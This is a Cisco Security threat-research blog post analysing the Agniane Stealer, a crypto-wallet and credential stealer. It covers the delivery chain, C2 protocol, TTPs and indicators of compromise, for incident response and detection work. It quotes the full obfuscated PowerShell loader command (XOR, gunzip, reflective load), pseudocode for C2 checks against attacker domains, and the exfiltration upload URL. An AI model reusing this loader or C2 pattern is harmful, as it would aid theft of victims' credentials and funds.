Avatar Avatar

The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our recent study has led to the successful identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have recently uncovered more information on the malware’s methods for file collection and the intricacies of its command and control (C2) protocol. We also have new reverse engineering insights into the malware’s architecture and communication.

We believe our work contributes to tactical and operational levels of intelligence regarding Agniane Stealer. It can prove useful from incident response to detector development and would be more suitable for a technical audience.

The Agniane Stealer has already been referenced in several articles. The Agniane stealer malware is being actively marketed and sold through a Telegram channel, accessible at t[.]me/agniane. Potential buyers can make purchases directly via this channel by interacting with a specialized bot, named @agnianebot, which facilitates the transaction process and provides additional information about the malware.” Our technical analysis indicates that it utilizes the ConfuserEx Protector and aims at identical targets. However, it employs a distinct C2 method, based on the sample observed in our telemetry data. Therefore, we have decided to publish a technical analysis of the sample.

Introduction

During our threat-hunting exercises in November 2023, we have noticed a pattern of renamed PowerShell binaries, called passbook.bat.exe. On closer inspection of the host machines, we have identified infections of the newly discovered malware family of Agniane Stealer. Threat research Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account. Researchers from the Zscaler ThreatLabz Team [2] and Pulsedive Threat Researchers [3] eventually followed up with blog posts of their own. Our work aims to contribute additional information understanding campaigns involving the use of Agniane Stealer.

Execution Chain

Execution chain.

The infections we detected seem to start with the downloading of ZIP files from compromised websites. All the websites from where we have seen the download of this file in our telemetry are normal websites with legitimate content. All download URLs had the below URL pattern:

http[s]://<domain name>\/book_[A-Z0-9]+-\d+\.zip

Once downloaded and extracted, the downloaded ZIP file drops a BAT file (passbook.bat) and additional ZIP file on the file system. The BAT file contains an obfuscated payload and after its execution through cmd.exe, it drops an executable which is renamed version of PowerShell binary (passbook.bat.exe). [4]

This enamed PowerShell was used to execute series of obfuscated commands.

passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(‘txeTllAdaeR'[-1..-11] -join ”)(‘C:\Users\user\AppData\Local\Temp\15\Rar$DIa63532.21112\passbook.bat’).Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(‘:: @’)) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); break; }; };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX, ‘_CASH_’, ”);$_CASH_afghH = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)(‘ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=’);for ($i = 0; $i -le $_CASH_afghH.Length – 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(‘daoL'[-1..-4] -join ”)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] (”)))

The command line shown above performs the following actions:

  • Reads the content of the previously extracted BAT file (passbook.bat).
  • Through string matches and replacements, builds the payload dynamically and assigns it to a variable.
  • Converted payload and static key from Base64 to a byte array.
  • XOR’d the payload using a static key.
  • Decompressed XOR’d payload using GZIP.
  • Invokes payload after reflectively loading it into memory.

To understand actions taken toward the objective, we reversed the payload.

Binary Analysis

The invoked payload continues with the execution of a C# assembly. We have dumped it into a file, where we get the executable with below hash,

5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.

At time of the analysis, the file was unknown to online sandboxes. We have decided to emulate the activity on the Cisco Secure Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic analysis could not be completed as we did not execute the first stage of the sample of the malware. Therefore, we decided to analyze the sample manually, where we found later there are anti-sandbox techniques used.

The binary file was highly obfuscated with control flow manipulations, like ConfuserEx.

Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.

It is important to note that the sample did not contain a signature for ConfuserEx, yet it had an obfuscation method that resembled it.

After reversing the sample, we realized it contains another binary file in its resources section, which were getting reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx with direct signatures.

Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.
The C# file calling Invoke function for in memory loading and executions, a common approach to reflective loading of resources files.

As you can see from the previous screenshot, it is calling Invoke functions from an entry Point object, which contains a parsed resource.

Loading resource data from malicious sample, which is later executed in the memory. The start of the execution is in the image above.

The entire loading process appears as though passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# applications, which reflectively load the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:

Malware execution chain. _CASH_78 is the final payload. The previous steps were used only for obfuscations. There were multiple stages of sample to finally loading _CASH_78 app. _CASH_78 app is final malware, stages before are used only for delivery, obfuscations or detection evasion.

Command and Control

The Agniane Stealer operates in a straightforward yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of any domain names through a simple C# web request, checking if the return value is “13.” This time request was made to a URL labeled “test,” for instance.

WebClient wc = new WebClient();

urlData = wc.DownloadString(“https://trecube[.]com/test”);

If urlData == “13” {

list_of_active_c2.Add(“trecube[.]com”)

continue;

}

In our sample, we can see the following IOCs (indicators of compromise) presented in resources file:

trecube[.]com

trecube13[.]ru

imitato23[.]store

wood100home[.]ru

For all these domains, the sample is calling for a test URL.

urlList = {“https://trecube.com/”, “https://trecube13.ru/”, “https://imitato23.store/”, “https://wood100home.ru/”}

for domain in domainList:

{

WebClient wc = new WebClient();

urlData = wc.DownloadString(domain + “test”);

If urlData == “13” {

list_of_active_c2.Add(domain)

continue;

}

}

Later, the malware calls C2 to get a list of file extensions to look for. This is located at URL pattern getext?id= followed by an ID – a part of resources of the _CASH_78 file. On this website, the list of extensions is separated by a semicolon, and for example on a website trecube[.]store it looks like:

*.txt; *.doc; *.docx; *.wallet; *seed*

Again, this is handled as previous checking string in the code. It is parsed/split by semicolon and a list of extensions is created in a list of variables in C# code.

The Code handling via dynamic analysis, through which we identified the C2 URL as a breakpoint for DownloadString.

Subsequently, the malware requests a remote json file containing the details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection settings. However, it is important to note that the URL pattern can be utilized for tracking malware through telemetry or online sandbox services for OSINT purposes. The URL looks like:

hxxps://trecube13[.]ru/getjson?id=67

And here what its corresponding output looks like:

{

“debug”: “0”,

“emulate”: “0”,

“virtualbox”: “1”,

“virustotal”: “0”,

“error”: “0”,

“errorname”: “NONE”,

“errortext”: “NONE”

“competitor”: “0”

}

The next stage involves enumeration and collection. It scans the computer to collect all documents with specified extensions instructed by the URL with a “getext” pattern, along with other credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a common activity amongst information stealer malware. Additionally, Agniane was checking to see the localization setting of the victim computer. If it contains any of the language packages below, it does not proceed with the infection,

 

ru-RU

kk-KZ

ro-MD

uz-UZ

be-BY

az-Latn-AZ

hy-AM

ky-KG

tg-Cyrl-TJ

The allowlisting of some regions can also mean the developer does not want to attack specific regions. Based on other observations it is possible to expect the attacker is from a country with a strong diplomatic tie to Russia.

Once all the target files are collected, the malware creates a ZIP archive under the “local application data” folder,

C:\Users\[user]\AppData\Local\[A-Z0-9]{32}

Below is the structure/content of this archive file

Agniane Stealer.txt //added as attachement here

Installe Apps.txt //added as attachement here

PC Information.txt //added as attachement here

Files from Desktop //FOLDER – contains exfiltrated files from Desktop folder

Files from … //FOLDER – contains exfiltrated files from …

 

… //and other folders, which contain exfiltrated files.

It is later uploaded to

https://trecube[.]com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0

Below you can find the illustrated version of the Agniane Stealer’s C2 communication,

The C2 communication protocol.

Other TTPs

The Agniane Stealer was also seen performing following actions:

  • Enumerating registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall for installed applications, it also collects this information.
  • Checking for a public IP on a ip-api.com, i.e,
    https://ip-api.com/json/?fields=11827
  • Dumping Bitcoin and other cryptocurrency wallets
  • Performing (not well) checks to see if it’s running in a debugged or virtual env. etc.
  • Collecting wallet.dat files.
  • Enumerating Profile and User data.
  • Collecting stored credit cards.
  • Adding other malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).

Conclusion

The Agniane Stealer tries to remain undetected through various obfuscation and anti-VM/debug techniques. It exhibits common behavior for stealers such as collecting and exfiltrating files, credentials password, credit card details, wallets, etc. Its evasive nature and targeting of various information might attract more adversaries in future to leverage its services.

Kill Chain

Kill Chain Activity TTP
Weaponization Use of PowerShell, ZIP file, batch file T1059.005
T1059.001
Delivery ZIP file downloaded by the browser T1204.002
Use of compromised websites T1584.004
Exploitation Running Obfuscated PowerShell payload T1059.001
T1027.010
PowerShell decrypts payload using XOR and decompress using Gunzip T1140
T1059.001
Reflective loading of the payload through Powershell T1059.001
T1204.002
T1620
Use of Renamed PowerShell T1036.003
Installation
Command and Control
Actions on Objectives Collection of various information from the host T1119
Targeting of credentials T1555

Indicators of Compromise

Type Stage IOC (indicators of compromise)
File Hash Delivery 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
File Hash Delivery e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
File Hash Delivery b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
Domain C2 trecube[.]com
Domain C2 trecube[.]store
Domain C2 trecube13[.]ru
Domain C2 imitato23[.]store
Domain C2 wood100home[.]ru

References

[1] https://twitter.com/MalGamy12/status/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://blog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco Security Social Channels

Instagram
Facebook
Twitter
LinkedIn



Authors

Adela Jezkova

Data Science Analyst

SecureX

Jan Kotrady

Security Research Engineering Technical Leader

Security Business Group